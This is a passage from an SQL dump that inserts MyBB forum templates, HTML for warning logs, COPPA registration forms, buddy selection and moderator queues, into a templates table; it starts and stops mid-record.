</tr>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('506', 'warnings_warn_post', ' <tr>\n <td width=\"20%\" class=\"trow2\"><strong>{$lang->post}</strong></td>\n <td class=\"trow2\"><input type=\"hidden\" name=\"pid\" value=\"{$post[\'pid\']}\" /><a href=\"{$post_link}\">{$post[\'subject\']}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('507', 'usercp_warnings', ' <br />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"4\">\n <div class=\"float_right\">{$lang->current_warning_level}</div>\n <div><strong>{$lang->latest_warnings}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date_issued}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->expiry_date}</strong></span></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td>\n </tr>\n </thead>\n <tbody>\n {$warnings}\n </tbody>\n </table>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('508', 'usercp_warnings_warning', ' <tr>\n <td class=\"{$alt_bg}\">{$warning_type} {$points}{$post_link}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$date_issued}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$expires}</td>\n <td class=\"{$alt_bg}\" align=\"center\">{$issuedby}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('509', 'postbit_warninglevel', '<br />{$lang->postbit_warning_level} <a href=\"{$warning_link}\">{$warning_level}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('510', 'postbit_warn', '<a href=\"warnings.php?action=warn&amp;uid={$post[\'uid\']}&amp;pid={$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_warn.gif\" alt=\"{$lang->postbit_warn}\" title=\"{$lang->postbit_warn}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('511', 'member_profile_referrals', '<tr>\n<td class=\"{$bg_color}\"><strong>{$lang->members_referred}</strong></td>\n<td class=\"{$bg_color}\">{$memprofile[\'referrals\']}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('512', 'member_profile_warninglevel', '<tr>\n <td class=\"{$bg_color}\"><strong>{$lang->warning_level}</strong></td>\n <td class=\"{$bg_color}\"><a href=\"{$warning_link}\">{$warning_level}</a> {$warn_user}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('513', 'member_profile_warn', '[<a href=\"warnings.php?action=warn&amp;uid={$memprofile[\'uid\']}\">{$lang->warn}</a>]', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('514', 'warnings_view', '<html>\n<head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->warning_log}</title>\n {$headerinclude}\n</head>\n<body>\n {$header}\n\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\">\n <div class=\"float_right\">{$status}</div>\n <div><strong>{$lang->warning_details}</strong></div>\n </td>\n </tr>\n {$warning_info}\n <tr>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->date_issued}<strong></span></td>\n </tr>\n <tr>\n <td class=\"trow2\">{$warning_type} {$points}</td>\n <td class=\"trow2\">{$date_issued}</td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->expiry_date}<strong></span></td>\n </tr>\n <tr>\n <td class=\"trow1\">{$issuedby}</td>\n <td class=\"trow1\">{$expires} {$revoked_date}</td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->warning_note}</strong></span></td>\n </tr>\n <tr>\n <td class=\"trow2\" colspan=\"2\">{$notes}</td>\n </tr>\n </table>\n\n {$revoke}\n\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('515', 'warnings_view_post', ' <tr>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->post}<strong></span></td>\n </tr>\n <tr>\n <td class=\"trow1\">{$user_link}</td>\n <td class=\"trow1\"><a href=\"{$post_link}\">{$warning[\'post_subject\']}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('516', 'warnings_view_user', ' <tr>\n <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n </tr>\n <tr>\n <td class=\"trow1\" colspan=\"2\">{$user_link}</td>\n </tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('517', 'warnings_view_revoke', '<br />\n{$warn_errors}\n<form action=\"warnings.php\" method=\"post\" name=\"input\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"action\" value=\"do_revoke\" />\n <input type=\"hidden\" name=\"wid\" value=\"{$warning[\'wid\']}\" />\n\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td colspan=\"2\" class=\"thead\"><strong>{$lang->revoke_warning}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->revoke_warning_desc}</strong></span></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"20%\" valign=\"top\"><strong>{$lang->reason}</strong></td>\n <td class=\"trow1\"><textarea name=\"reason\" cols=\"60\" rows=\"4\"></textarea></td>\n </tr>\n </table>\n <br />\n <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->revoke_warning}\" /></div>\n</form>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('518', 'warnings_view_revoked', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->warning_is_revoked}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->revoked_by}</strong></span></td>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->date_revoked}</strong></span></td>\n </tr>\n <tr>\n <td class=\"trow1\">{$revoked_by}</td>\n <td class=\"trow1\">{$date_revoked}</td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->reason}</strong></span></td>\n </tr>\n <tr>\n <td class=\"trow2\" colspan=\"2\">{$revoke_reason}</td>\n </tr>\n</table>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('519', 'xmlhttp_buddyselect', '<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\" style=\"width: 300px;\">\n <thead>\n <tr>\n <td class=\"thead\">\n <div class=\"float_right\" style=\"margin-top: 3px;\"><span class=\"smalltext\"><a href=\"#\" onclick=\"UserCP.closeBuddySelect(true); return false;\">{$lang->close}</a></span></div>\n <div><strong>{$lang->select_buddies}</strong></div>\n </td>\n </tr>\n </thead>\n <tbody>\n <tr>\n <td class=\"trow1 smalltext\">{$lang->select_buddies_desc}</td>\n </tr>\n <tr>\n <td class=\"trow2\">\n <div style=\"height: 200px; overflow: auto;\" >\n <table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\" style=\"border: 0; width: 270px;\" align=\"right\">\n {$online}\n {$offline}\n </table>\n </div>\n </td>\n </tr>\n <tr>\n <td class=\"trow1\">\n <div class=\"smalltext\"><strong>{$lang->selected_recipients}</strong></div>\n <div id=\"buddyselect_buddies\" class=\"smalltext\" style=\"padding-left: 10px; height: 50px; overflow: auto;\"></div>\n <div style=\"text-align: right;\"><input type=\"button\" class=\"button\" value=\"{$lang->ok}\" onclick=\"UserCP.closeBuddySelect();\" /> <input type=\"button\" class=\"button\" value=\"{$lang->cancel}\" onclick=\"UserCP.closeBuddySelect(true);\" /></div>\n </td>\n </tr>\n </tbody>\n</table>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('520', 'xmlhttp_buddyselect_online', ' <tr>\n <td class=\"trow1\" onmouseover=\"this.className=\'trow2\';\" onmouseout=\"this.className=\'trow1\';\"><label><input type=\"checkbox\" style=\"vertical-align: middle;\" id=\"checkbox_{$buddy[\'uid\']}\" onclick=\"UserCP.selectBuddy(\'{$buddy[\'uid\']}\', \'{$buddy[\'username\']}\');\" /> <img src=\"{$theme[\'imgdir\']}/buddy_online.gif\" alt=\"({$lang->online})\" title=\"{$lang->online}\" style=\"vertical-align: middle;\" /> {$buddy_name}</label></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('521', 'xmlhttp_buddyselect_offline', ' <tr>\n <td class=\"trow1\" onmouseover=\"this.className=\'trow2\';\" onmouseout=\"this.className=\'trow1\';\"><label><input type=\"checkbox\" style=\"vertical-align: middle;\" id=\"checkbox_{$buddy[\'uid\']}\" onclick=\"UserCP.selectBuddy(\'{$buddy[\'uid\']}\', \'{$buddy[\'username\']}\');\" /> <img src=\"{$theme[\'imgdir\']}/buddy_offline.gif\" alt=\"({$lang->offline})\" title=\"{$lang->offline}\" style=\"vertical-align: middle;\" /> {$buddy_name}</label></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('522', 'private_send_buddyselect', '<script type=\"text/javascript\"><!--\ndocument.write(\'<br /><span class=\"smalltext\"><a href=\"#\" onclick=\"UserCP.openBuddySelect(\\\'{$buddy_select}\\\');\"><img src=\"{$theme[\'imgdir\']}/buddies.gif\" alt=\"\" style=\"vertical-align: middle;\" alt=\"\" title=\"{$lang->select_from_buddies}\" /> {$lang->select_from_buddies}</a></span>\');\n// --></script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('523', 'forumdisplay_announcements_announcement_modbit', '<td align=\"center\" class=\"{$bgcolor}\">-</td>', '-2', '128', '', '1339729416'); INSERT INTO mybb_templates VALUES('524', 'calendar_dayview_noevents', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\">{$lang->no_events}</td>\n</tr>\n</table>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('525', 'forumbit_depth2_forum_lastpost', '<span class=\"smalltext\">\n<a href=\"{$lastpost_link}\" title=\"{$full_lastpost_subject}\"><strong>{$lastpost_subject}</strong></a>\n<br />{$lastpost_date} {$lastpost_time}<br />{$lang->by} {$lastpost_profilelink}</span>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('526', 'forumbit_depth1_forum_lastpost', '<span class=\"smalltext\">\n<a href=\"{$lastpost_link}\" title=\"{$full_lastpost_subject}\"><strong>{$lastpost_subject}</strong></a>\n<br />{$lastpost_date} {$lastpost_time}<br />{$lang->by} {$lastpost_profilelink}</span>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('527', 'member_register_coppa', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n{$lang->coppa_desc}\n<div style=\"width: 400px; margin: auto; margin-bottom: 15px;\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td colspan=\"1\" class=\"thead\"><strong>{$lang->date_of_birth}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\">\n <table cellpadding=\"4\" border=\"0\" align=\"center\">\n <tr>\n <td class=\"smalltext\"><label for=\"day\">{$lang->day}:</label></td>\n <td class=\"smalltext\"><label for=\"month\">{$lang->month}:</label></td>\n <td class=\"smalltext\"><label for=\"year\">{$lang->year}:</label></td>\n </tr>\n <tr>\n <td>\n <select name=\"bday1\" id=\"day\">\n <option value=\"\">&nbsp;</option>\n {$bdaysel}\n </select>\n </td>\n <td>\n <select name=\"bday2\" id=\"month\">\n <option value=\"\">&nbsp;</option>\n <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option>\n </select>\n </td>\n <td>\n <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"bday3\" id=\"year\" value=\"{$mybb->input[\'bday3\']}\" />\n </td>\n </tr>\n </table>\n <div class=\"smalltext\" style=\"text-align: center;\">{$lang->hide_dob}</div>\n </td>\n </tr>\n </table>\n</div>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"register\" />\n<input type=\"submit\" class=\"button\" name=\"agree\" value=\"{$lang->continue_registration}\" />\n</div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('528', 'member_coppa_form', '<html>\n<head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->coppa_compliance}</title>\n <style type=\"text/css\">\n body { font-family: Verdana, Arial, sans-serif; font-size: 13px; }\n .largetext, h1 { font-family: Verdana, Arial, sans-serif; font-size: medium; font-weight: bold; margin: 0; }\n .grey { color: #ccc; }\n dl { margin-left: 40px; }\n dt { width: 150px; float: left; clear: left; font-weight: bold; }\n dd { margin-bottom: 20px; margin-left: 150px; }\n dd.single { margin-left: 0; }\n input.textbox { border: 0; border-bottom: 1px solid #000; font-size: 16px; width: 350px; }\n input.date { width: 80px; }\n </style>\n</head>\n<body>\n <div style=\"float: right; text-align: center; padding-bottom: 10px;\" class=\"largetext\">\n {$mybb->settings[\'bbname\']}<br /><span class=\"grey\">{$lang->coppa_registration}</span>\n </div>\n <div style=\"padding-bottom: 10px;\"><a href=\"index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" border=\"0\" /></a></div>\n <hr size=\"1\" style=\"clear: both;\" />\n\n <p>{$lang->coppa_form_instructions}</p>\n\n <dl>\n <dt>{$lang->fax_number}</dt>\n <dd>{$mybb->settings[\'faxno\']}</dd>\n\n <dt>{$lang->mailing_address}</dt>\n <dd>{$mybb->settings[\'mailingaddress\']}</dd>\n </dl>\n\n <h1 style=\"clear: both;\" />{$lang->account_information}</h1>\n <dl>\n <dt><label for=\"username\">{$lang->username}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"username\" /></dd>\n\n <dt><label for=\"email\">{$lang->email}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"email\" /></dd>\n </dl>\n <h1 style=\"clear: both;\" />{$lang->parent_details}</h1>\n <dl>\n <dt><label for=\"name\">{$lang->full_name}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"name\" /></dd>\n\n <dt><label for=\"relation\">{$lang->relation}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"relation\" /></dd>\n\n <dt><label for=\"phone\">{$lang->phone_no}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"phone\" /></dd>\n\n <dt><label for=\"parent_email\">{$lang->email}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"parent_email\" /></dd>\n\n <dd class=\"single\">{$lang->coppa_parent_agreement}</dd>\n\n <dt><label for=\"signature\">{$lang->signature}</label></dt>\n <dd><input type=\"text\" class=\"textbox\" id=\"signature\" /> Date: <input type=\"text\" class=\"textbox date\" id=\"date\" /></dd>\n </dl>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('529', 'member_register_agreement_coppa', '<tr>\n <td class=\"tcat\"><strong>{$lang->coppa_compliance}</strong></td>\n</tr>\n<tr>\n <td class=\"trow1\">\n <p>{$lang->coppa_agreement_1}</p>\n <p>{$lang->coppa_agreement_2}</p>\n <p>{$lang->coppa_agreement_3}</p>\n </td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('530', 'modcp_modqueue_noresults', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"{$colspan}\">{$lang->error_no_results}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('531', 'modcp_modqueue_threads', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->threads_awaiting_moderation}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"modcp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_modqueue\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"3\">\n <div class=\"float_right\">\n <strong>{$lang->threads}</strong> |\n <a href=\"modcp.php?action=modqueue&amp;type=posts\">{$lang->posts}</a> |\n <a href=\"modcp.php?action=modqueue&amp;type=attachments\">{$lang->attachments}</a>\n </div>\n <strong>{$lang->threads_awaiting_moderation}</strong>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->subject}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td>\n </tr>\n {$threads}\n </table>\n{$multipage}\n{$mass_controls}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->perform_actions}\" /></div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('532', 'modcp_modqueue_threads_thread', ' <tr>\n <td class=\"{$altbg}\"><a href=\"{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a></td>\n <td class=\"{$altbg}\" align=\"center\">{$profile_link}</td>\n <td align=\"center\" class=\"{$altbg}\">{$threaddate}, {$threadtime}</td>\n </tr>\n <tr>\n <td class=\"{$altbg}\" colspan=\"3\">\n <div class=\"modqueue_message\">\n <div class=\"float_right modqueue_controls\">\n <label class=\"label_radio_ignore\"><input type=\"radio\" class=\"radio radio_ignore\" name=\"threads[{$thread[\'tid\']}]\" value=\"ignore\" checked=\"checked\" /> {$lang->ignore}</label>\n <label class=\"label_radio_delete\"><input type=\"radio\" class=\"radio radio_delete\" name=\"threads[{$thread[\'tid\']}]\" value=\"delete\" /> {$lang->delete}</label>\n <label class=\"label_radio_approve\"><input type=\"radio\" class=\"radio radio_approve\" name=\"threads[{$thread[\'tid\']}]\" value=\"approve\" /> {$lang->approve}</label>\n </div>\n <div class=\"modqueue_meta\">\n {$forum}\n </div>\n {$thread[\'postmessage\']}\n </div>\n </td>\n </tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('533', 'modcp_modqueue_posts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->posts_awaiting_moderation}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"modcp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_modqueue\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"3\">\n <div class=\"float_right\">\n <a href=\"modcp.php?action=modqueue&amp;type=threads\">{$lang->threads}</a> |\n <strong>{$lang->posts}</strong> |\n <a href=\"modcp.php?action=modqueue&amp;type=attachments\">{$lang->attachments}</a>\n </div>\n <strong>{$lang->posts_awaiting_moderation}</strong>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->subject}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td>\n </tr>\n {$posts}\n </table>\n{$multipage}\n{$mass_controls}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->perform_actions}\" /></div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('534', 'modcp_modqueue_posts_post', ' <tr>\n <td class=\"{$altbg}\"><a href=\"{$post[\'postlink\']}#pid{$post[\'pid\']}\">{$post[\'subject\']}</a></td>\n <td class=\"{$altbg}\" align=\"center\">{$profile_link}</td>\n <td align=\"center\" class=\"{$altbg}\">{$postdate}, {$posttime}</td>\n </tr>\n <tr>\n <td class=\"{$altbg}\" colspan=\"3\">\n <div class=\"modqueue_message\">\n <div class=\"float_right modqueue_controls\">\n <label class=\"label_radio_ignore\"><input type=\"radio\" class=\"radio radio_ignore\" name=\"posts[{$post[\'pid\']}]\" value=\"ignore\" checked=\"checked\" /> {$lang->ignore}</label>\n <label class=\"label_radio_delete\"><input type=\"radio\" class=\"radio radio_delete\" name=\"posts[{$post[\'pid\']}]\" value=\"delete\" /> {$lang->delete}</label>\n <label class=\"label_radio_approve\"><input type=\"radio\" class=\"radio radio_approve\" name=\"posts[{$post[\'pid\']}]\" value=\"approve\" /> {$lang->approve}</label>\n </div>\n <div class=\"modqueue_meta\">\n {$forum}{$thread}\n </div>\n {$post[\'message\']}\n </div>\n </td>\n </tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('535', 'modcp_modqueue_attachments', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->attachments_awaiting_moderation}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"modcp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_modqueue\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$modcp_nav}\n<td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"6\">\n <div class=\"float_right\">\n <a href=\"modcp.php?action=modqueue&amp;type=threads\">{$lang->threads}</a> |\n <a href=\"modcp.php?action=modqueue&amp;type=posts\">{$lang->posts}</a> |\n <strong>{$lang->attachments}</strong>\n </div>\n <strong>{$lang->attachments_awaiting_moderation}</strong>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->filename}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->date}</strong></span></td>\n <td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->controls}</strong></span></td>\n </tr>\n {$attachments}\n </table>\n{$multipage}\n{$mass_controls}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"reportsubmit\" value=\"{$lang->perform_actions}\" /></div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('536', 'modcp_modqueue_attachments_attachment', ' <tr>\n <td class=\"{$altbg}\"><a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a> ({$attachment[\'filesize\']})<br /><small class=\"modqueue_meta\">Post: <a href=\"{$link}\">{$attachment[\'postsubject\']}</a></small></td>\n <td class=\"{$altbg}\" align=\"center\">{$profile_link}</td>\n <td align=\"center\" class=\"{$altbg}\">{$attachdate}, {$attachtime}</td>\n <td class=\"{$altbg}\" align=\"center\"><label class=\"label_radio_ignore\"><input type=\"radio\" class=\"radio radio_ignore\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"ignore\" checked=\"checked\" /> {$lang->ignore}</label></td>\n <td class=\"{$altbg}\" align=\"center\"><label class=\"label_radio_delete\"><input type=\"radio\" class=\"radio radio_delete\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"delete\" /> {$lang->delete}</label></td>\n <td class=\"{$altbg}\" align=\"center\"><label class=\"label_radio_approve\"><input type=\"radio\" class=\"radio radio_approve\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"approve\" /> {$lang->approve}</label></td>\n </tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('537', 'modcp_editprofile', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_profile}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n var mod_posts = \'{$modpost_check}\';\n var susp_posts = \'{$suspost_check}\';\n// -->\n</script>\n</head>\n<body>\n {$header}\n <form action=\"modcp.php\" method=\"post\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$errors}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_profile}</strong></td>\n </tr>\n <tr>\n <td width=\"50%\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->profile_required}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->current_username}</span></td>\n </tr>\n <tr>\n <td><strong>{$profile_link}</strong></td>\n </tr>\n {$requiredfields}\n </table>\n </fieldset>\n <br />\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->profile_optional}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td colspan=\"3\"><span class=\"smalltext\"><label><input type=\"checkbox\" class=\"checkbox\" name=\"remove_avatar\" value=\"1\" /> {$lang->remove_avatar}</label></span></td>\n </tr>\n\n <tr>\n <td colspan=\"3\"><span class=\"smalltext\">{$lang->birthday}</span></td>\n </tr>\n <tr>\n <td>\n <select name=\"birthday_day\">\n <option value=\"\">&nbsp;</option>\n {$bdaydaysel}\n </select>\n </td>\n <td>\n <select name=\"birthday_month\">\n <option value=\"\">&nbsp;</option>\n <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\" 